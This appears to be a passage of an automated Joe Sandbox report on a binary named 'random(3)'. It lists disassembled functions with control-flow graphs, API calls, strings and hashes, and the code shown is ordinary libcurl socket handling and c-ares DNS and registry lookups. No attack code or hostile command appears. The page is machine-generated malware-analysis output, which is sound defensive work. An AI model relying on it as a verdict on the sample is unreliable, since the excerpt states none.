                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: QueryValue$Open$CloseEnum
                                                • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                • API String ID: 4217438148-1047472027
                                                • Opcode ID: 88e3b4b540bf5e3c3859ea2fbcdca939daa7f67f1f1307211170ad11e888bfaa
                                                • Instruction ID: d9d9c380bbb83f6b562e28ab1d71661a5796fec9b0de05ec58958839720b2566
                                                • Opcode Fuzzy Hash: 88e3b4b540bf5e3c3859ea2fbcdca939daa7f67f1f1307211170ad11e888bfaa
                                                • Instruction Fuzzy Hash: 5772B2B1608301ABE720DB29DC81B5BB7E8EF85740F18482DF999D7291E771E944CB63
                                                Function 00C8A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                Download Yara Rule
                                                APIs
                                                • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 00C8A832
                                                Strings
                                                • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 00C8AD0A
                                                • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00C8A6CE
                                                • Trying [%s]:%d..., xrefs: 00C8A689
                                                • bind failed with errno %d: %s, xrefs: 00C8B080
                                                • Could not set TCP_NODELAY: %s, xrefs: 00C8A871
                                                • @, xrefs: 00C8A8F4
                                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 00C8ADAC
                                                • Local port: %hu, xrefs: 00C8AF28
                                                • cf_socket_open() -> %d, fd=%d, xrefs: 00C8A796
                                                • Trying %s:%d..., xrefs: 00C8A7C2, 00C8A7DE
                                                • @, xrefs: 00C8AC42
                                                • Bind to local port %d failed, trying next, xrefs: 00C8AFE5
                                                • cf-socket.c, xrefs: 00C8A5CD, 00C8A735
                                                • Couldn't bind to '%s' with errno %d: %s, xrefs: 00C8AE1F
                                                • Local Interface %s is ip %s using address family %i, xrefs: 00C8AE60
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: setsockopt
                                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                • API String ID: 3981526788-2373386790
                                                • Opcode ID: 6559872ff281d651963a8709766857461839cc566a970b651d364e580c48a96a
                                                • Instruction ID: 26b56b35db0518d687fcba916dcb33900c311cfc07606ce7417f08b57b31a64c
                                                • Opcode Fuzzy Hash: 6559872ff281d651963a8709766857461839cc566a970b651d364e580c48a96a
                                                • Instruction Fuzzy Hash: 44621471508381ABF724DF24C846BABB7E4BF81308F04491EF99897292E771E945CB97
                                                Function 00D19740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 858 d19740-d1975b 859 d19780-d19782 858->859 860 d1975d-d19768 call d178a0 858->860 862 d19914-d1994e call fd8b70 RegOpenKeyExA 859->862 863 d19788-d197a0 call fd8e00 call d178a0 859->863 868 d199bb-d199c0 860->868 869 d1976e-d19770 860->869 871 d19950-d19955 862->871 872 d1995a-d19992 RegQueryValueExA RegCloseKey call fd8b98 862->872 863->868 874 d197a6-d197c5 863->874 875 d19a0c-d19a15 868->875 873 d19772-d1977e 869->873 869->874 871->875 888 d19997-d199b5 call d178a0 872->888 873->863 881 d19827-d19833 874->881 882 d197c7-d197e0 874->882 884 d19835-d1985c call d0e2b0 * 2 881->884 885 d1985f-d19872 call d15ca0 881->885 886 d197e2-d197f3 call fd8b50 882->886 887 d197f6-d19809 882->887 884->885 899 d199f0 885->899 900 d19878-d1987d call d177b0 885->900 886->887 887->881 898 d1980b-d19810 887->898 888->868 888->874 898->881 903 d19812-d19822 898->903 902 d199f5-d199fb call d15d00 899->902 907 d19882-d19889 900->907 913 d199fe-d19a09 902->913 903->875 907->902 911 d1988f-d1989b call d04fe0 907->911 911->899 916 d198a1-d198c3 call fd8b50 call d178a0 911->916 913->875 922 d199c2-d199ed call d0e2b0 * 2 916->922 923 d198c9-d198db call d0e2d0 916->923 922->899 923->922 928 d198e1-d198f0 call d0e2d0 923->928 928->922 934 d198f6-d19905 call d163f0 928->934 938 d19f66-d19f7f call d15d00 934->938 939 d1990b-d1990f 934->939 938->913 940 d19a3f-d19a5a call d16740 call d163f0 939->940 940->938 947 d19a60-d19a6e call d16d60 940->947 950 d19a70-d19a94 call d16200 call d167e0 call d16320 947->950 951 d19a1f-d19a39 call d16840 call d163f0 947->951 962 d19a16-d19a19 950->962 963 d19a96-d19ac6 call d0d120 950->963 951->938 951->940 962->951 965 d19fc1 962->965 968 d19ae1-d19af7 call d0d190 963->968 969 d19ac8-d19adb call d0d120 963->969 967 d19fc5-d19ffd call d15d00 call d0e2b0 * 2 965->967 967->913 968->951 977 d19afd-d19b09 call d04fe0 968->977 969->951 969->968 977->965 983 d19b0f-d19b29 call d0e730 977->983 987 d19f84-d19f88 983->987 988 d19b2f-d19b3a call d178a0 983->988 990 d19f95-d19f99 987->990 988->987 995 d19b40-d19b54 call d0e760 988->995 992 d19fa0-d19fb6 call d0ebf0 * 2 990->992 993 d19f9b-d19f9e 990->993 1005 d19fb7-d19fbe 992->1005 993->965 993->992 1001 d19f8a-d19f92 995->1001 1002 d19b5a-d19b6e call d0e730 995->1002 1001->990 1008 d19b70-d1a004 1002->1008 1009 d19b8c-d19b97 call d163f0 1002->1009 1005->965 1014 d1a015-d1a01d 1008->1014 1015 d19c9a-d19cab call d0ea00 1009->1015 1016 d19b9d-d19bbf call d16740 call d163f0 1009->1016 1017 d1a024-d1a045 call d0ebf0 * 2 1014->1017 1018 d1a01f-d1a022 1014->1018 1027 d19f31-d19f35 1015->1027 1028 d19cb1-d19ccd call d0ea00 call d0e960 1015->1028 1016->1015 1035 d19bc5-d19bda call d16d60 1016->1035 1017->967 1018->967 1018->1017 1030 d19f40-d19f61 call d0ebf0 * 2 1027->1030 1031 d19f37-d19f3a 1027->1031 1044 d19cfd-d19d0e call d0e960 1028->1044 1045 d19ccf 1028->1045 1030->951 1031->951 1031->1030 1035->1015 1047 d19be0-d19bf4 call d16200 call d167e0 1035->1047 1056 d19d10 1044->1056 1057 d19d53-d19d55 1044->1057 1048 d19cd1-d19cec call d0e9f0 call d0e4a0 1045->1048 1047->1015 1066 d19bfa-d19c0b call d16320 1047->1066 1068 d19d47-d19d51 1048->1068 1069 d19cee-d19cfb call d0e9d0 1048->1069 1061 d19d12-d19d2d call d0e9f0 call d0e4a0 1056->1061 1060 d19e69-d19e8e call d0ea40 call d0e440 1057->1060 1086 d19e90-d19e92 1060->1086 1087 d19e94-d19eaa call d0e3c0 1060->1087 1083 d19d5a-d19d6f call d0e960 1061->1083 1084 d19d2f-d19d3c call d0e9d0 1061->1084 1078 d19c11-d19c1c call d17b70 1066->1078 1079 d19b75-d19b86 call d0ea00 1066->1079 1074 d19dca-d19ddb call d0e960 1068->1074 1069->1044 1069->1048 1096 d19ddd-d19ddf 1074->1096 1097 d19e2e-d19e36 1074->1097 1078->1009 1100 d19c22-d19c33 call d0e960 1078->1100 1079->1009 1105 d19f2d 1079->1105 1114 d19d71-d19d73 1083->1114 1115 d19dc2 1083->1115 1084->1061 1111 d19d3e-d19d42 1084->1111 1093 d19eb3-d19ec4 call d0e9c0 1086->1093 1108 d19eb0-d19eb1 1087->1108 1109 d1a04a-d1a04c 1087->1109 1093->951 1118 d19eca-d19ed0 1093->1118 1106 d19e06-d19e21 call d0e9f0 call d0e4a0 1096->1106 1102 d19e38-d19e3b 1097->1102 1103 d19e3d-d19e5b call d0ebf0 * 2 1097->1103 1127 d19c35 1100->1127 1128 d19c66-d19c75 call d178a0 1100->1128 1102->1103 1116 d19e5e-d19e67 1102->1116 1103->1116 1105->1027 1142 d19de1-d19dee call d0ec80 1106->1142 1143 d19e23-d19e2c call d0eac0 1106->1143 1108->1093 1121 d1a057-d1a070 call d0ebf0 * 2 1109->1121 1122 d1a04e-d1a051 1109->1122 1111->1060 1123 d19d9a-d19db5 call d0e9f0 call d0e4a0 1114->1123 1115->1074 1116->1060 1116->1093 1126 d19ee5-d19ef2 call d0e9f0 1118->1126 1121->1005 1122->965 1122->1121 1156 d19d75-d19d82 call d0ec80 1123->1156 1157 d19db7-d19dc0 call d0eac0 1123->1157 1126->951 1150 d19ef8-d19f0e call d0e440 1126->1150 1135 d19c37-d19c51 call d0e9f0 1127->1135 1146 d1a011 1128->1146 1147 d19c7b-d19c8f call d0e7c0 1128->1147 1135->1009 1172 d19c57-d19c64 call d0e9d0 1135->1172 1160 d19df1-d19e04 call d0e960 1142->1160 1143->1160 1146->1014 1147->1009 1167 d19c95-d1a00e 1147->1167 1170 d19f10-d19f26 call d0e3c0 1150->1170 1171 d19ed2-d19edf call d0e9e0 1150->1171 1176 d19d85-d19d98 call d0e960 1156->1176 1157->1176 1160->1097 1160->1106 1167->1146 1170->1171 1184 d19f28 1170->1184 1171->951 1171->1126 1172->1128 1172->1135 1176->1115 1176->1123 1184->965
                                                APIs
                                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00D19946
                                                • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00D19974
                                                • RegCloseKey.KERNELBASE(?), ref: 00D1998B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: CloseOpenQueryValue
                                                • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                • API String ID: 3677997916-4129964100
                                                • Opcode ID: 0e350d66287bb41185f829b5cd336c1151bca0210dad1a6f930c2a34f473ac1f
                                                • Instruction ID: 50ddd3482d3fb61b61eeab889c38e30b92d6d7a16855e3c90a0417c0172d94a0
                                                • Opcode Fuzzy Hash: 0e350d66287bb41185f829b5cd336c1151bca0210dad1a6f930c2a34f473ac1f
                                                • Instruction Fuzzy Hash: 623293B1904201BBEB11AB25BC62B9BB7A8EF54314F084834F84D96253FF21E955C7B3
                                                Function 00C88B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1268 c88b50-c88b69 1269 c88b6b-c88b74 1268->1269 1270 c88be6 1268->1270 1271 c88beb-c88bf2 1269->1271 1272 c88b76-c88b8d 1269->1272 1273 c88be9 1270->1273 1274 c88b8f-c88ba7 call c66e40 1272->1274 1275 c88bf3-c88bfe call c8a550 1272->1275 1273->1271 1282 c88cd9-c88d16 SleepEx getsockopt 1274->1282 1283 c88bad-c88baf 1274->1283 1280 c88de4-c88def 1275->1280 1281 c88c04-c88c08 1275->1281 1284 c88e8c-c88e95 1280->1284 1285 c88df5-c88e19 call c8a150 1280->1285 1286 c88dbd-c88dc3 1281->1286 1287 c88c0e-c88c1d 1281->1287 1290 c88d18-c88d20 1282->1290 1291 c88d22 1282->1291 1288 c88bb5-c88bb9 1283->1288 1289 c88ca6-c88cb0 1283->1289 1292 c88f00-c88f06 1284->1292 1293 c88e97-c88e9c 1284->1293 1325 c88e88 1285->1325 1326 c88e1b-c88e26 1285->1326 1286->1273 1295 c88c1f-c88c30 connect 1287->1295 1296 c88c35-c88c48 call c8a150 1287->1296 1288->1271 1298 c88bbb-c88bc2 1288->1298 1289->1282 1297 c88cb2-c88cb8 1289->1297 1299 c88d26-c88d39 1290->1299 1291->1299 1292->1271 1300 c88e9e-c88eb6 call c62a00 1293->1300 1301 c88edf-c88eef call c578b0 1293->1301 1295->1296 1327 c88c4d-c88c4f 1296->1327 1303 c88ddc-c88dde 1297->1303 1304 c88cbe-c88cd4 call c8b180 1297->1304 1298->1271 1305 c88bc4-c88bcc 1298->1305 1307 c88d3b-c88d3d 1299->1307 1308 c88d43-c88d61 call c6d8c0 call c8a150 1299->1308 1300->1301 1324 c88eb8-c88edd call c63410 * 2 1300->1324 1329 c88ef2-c88efc 1301->1329 1303->1273 1303->1280 1304->1280 1313 c88bce-c88bd2 1305->1313 1314 c88bd4-c88bda 1305->1314 1307->1303 1307->1308 1330 c88d66-c88d74 1308->1330 1313->1271 1313->1314 1314->1271 1321 c88bdc-c88be1 1314->1321 1328 c88dac-c88db8 call c950a0 1321->1328 1324->1329 1325->1284 1332 c88e28-c88e2c 1326->1332 1333 c88e2e-c88e85 call c6d090 call c94fd0 1326->1333 1334 c88c8e-c88c93 1327->1334 1335 c88c51-c88c58 1327->1335 1328->1271 1329->1292 1330->1271 1339 c88d7a-c88d81 1330->1339 1332->1325 1332->1333 1333->1325 1337 c88dc8-c88dd9 call c8b100 1334->1337 1338 c88c99-c88c9f 1334->1338 1335->1334 1342 c88c5a-c88c62 1335->1342 1337->1303 1338->1289 1339->1271 1344 c88d87-c88d8f 1339->1344 1346 c88c6a-c88c70 1342->1346 1347 c88c64-c88c68 1342->1347 1349 c88d9b-c88da1 1344->1349 1350 c88d91-c88d95 1344->1350 1346->1334 1353 c88c72-c88c8b call c950a0 1346->1353 1347->1334 1347->1346 1349->1271 1355 c88da7 1349->1355 1350->1271 1350->1349 1353->1334 1355->1328
                                                APIs
                                                • connect.WS2_32(?,?,00000001), ref: 00C88C30
                                                • SleepEx.KERNELBASE(00000000,00000000), ref: 00C88CF3
                                                • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00C88D0F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: Sleepconnectgetsockopt
                                                • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                • API String ID: 1669343778-879669977
                                                • Opcode ID: 2e3be956a6bd63ea85f57ca10b1d522c6431017c7876ffda43c7d7d88ea2e565
                                                • Instruction ID: 570ce0db87a67273a9d91e5cf72fcb53a4e5666ed5e76849ce2dc40a79e15f11
                                                • Opcode Fuzzy Hash: 2e3be956a6bd63ea85f57ca10b1d522c6431017c7876ffda43c7d7d88ea2e565
                                                • Instruction Fuzzy Hash: E1B1F374604306AFDB20EF24CC85BA7B7E0AF81318F44892DE8694B6D2DB70ED49C765
                                                Function 00C52F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144registryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1454 c52f17-c52f8c call 1106430 call 1106820 1459 c531c9-c531cd 1454->1459 1460 c52f91-c52ff4 call c51619 RegOpenKeyExA 1459->1460 1461 c531d3-c531d6 1459->1461 1464 c531c5 1460->1464 1465 c52ffa-c5300b 1460->1465 1464->1459 1466 c5315c-c531ac RegEnumKeyExA 1465->1466 1467 c53010-c53083 call c51619 RegOpenKeyExA 1466->1467 1468 c531b2-c531c2 1466->1468 1472 c5314e-c53152 1467->1472 1473 c53089-c530d4 RegQueryValueExA 1467->1473 1468->1464 1472->1466 1474 c530d6-c53137 call 1106700 call 1106790 call 1106820 call 1106630 call 1106820 call 1104b90 1473->1474 1475 c5313b-c5314b RegCloseKey 1473->1475 1474->1475 1475->1472
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: EnumOpen
                                                • String ID: d
                                                • API String ID: 3231578192-2564639436
                                                • Opcode ID: 1b70ca1ded006733a50c9dd5a24ddb9e765e6565a888a74248da7855853990ed
                                                • Instruction ID: 74a811d6f705c4990aa6037ccdb862bf56700b3636773a3f0e072322bb10662b
                                                • Opcode Fuzzy Hash: 1b70ca1ded006733a50c9dd5a24ddb9e765e6565a888a74248da7855853990ed
                                                • Instruction Fuzzy Hash: 06719FB490431A9FDB54DF69C58479EBBF0FF84308F10885DE998A7240E7749A88CF92
                                                Function 00C89290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1488 c89290-c892ed call c576a0 1491 c893c3-c893ce 1488->1491 1492 c892f3-c892fb 1488->1492 1501 c893d0-c893e1 1491->1501 1502 c893e5-c89427 call c6d090 call c94f40 1491->1502 1493 c893aa-c893af 1492->1493 1494 c89301-c89333 call c6d8c0 call c6d9a0 1492->1494 1495 c893b5-c893bc 1493->1495 1496 c89456-c89470 1493->1496 1513 c89335-c89364 WSAIoctl 1494->1513 1514 c893a7 1494->1514 1499 c89429-c89431 1495->1499 1500 c893be 1495->1500 1504 c89439-c8943f 1499->1504 1505 c89433-c89437 1499->1505 1500->1496 1501->1495 1506 c893e3 1501->1506 1502->1496 1502->1499 1504->1496 1509 c89441-c89453 call c950a0 1504->1509 1505->1496 1505->1504 1506->1496 1509->1496 1517 c8939b-c893a4 1513->1517 1518 c89366-c8936f 1513->1518 1514->1493 1517->1514 1518->1517 1520 c89371-c89390 setsockopt 1518->1520 1520->1517 1521 c89392-c89395 1520->1521 1521->1517
                                                APIs
                                                • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00C8935D
                                                • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00C89389
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.1442412397.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000003.00000002.1442391729.0000000000C50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.00000000011E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000132E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.000000000134F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442412397.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442887927.0000000001354000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.0000000001356000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000014DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000015F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1442903455.00000000016ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443169682.00000000016EE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443284841.00000000018A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.1443303785.00000000018A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_c50000_random(3).jbxd
                                                Similarity
                                                • API ID: Ioctlsetsockopt
                                                • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                • API String ID: 1903391676-2691795271
                                                • Opcode ID: f919208f94eaa65efbec79a4e4008c681979cf62768e0cf60a6061b73e80f089
                                                • Instruction ID: 4ae4a6bb08c23e174d6498f4ce265b1d56befeea506e5ff5b37537b08242cbd6
                                                • Opcode Fuzzy Hash: f919208f94eaa65efbec79a4e4008c681979cf62768e0cf60a6061b73e80f089
                                                • Instruction Fuzzy Hash: F2511871600305AFDB15EF24C881FBAB7A5FF85318F188529FD588B292E730E951C795
                                                Function 00C576A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73networkCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
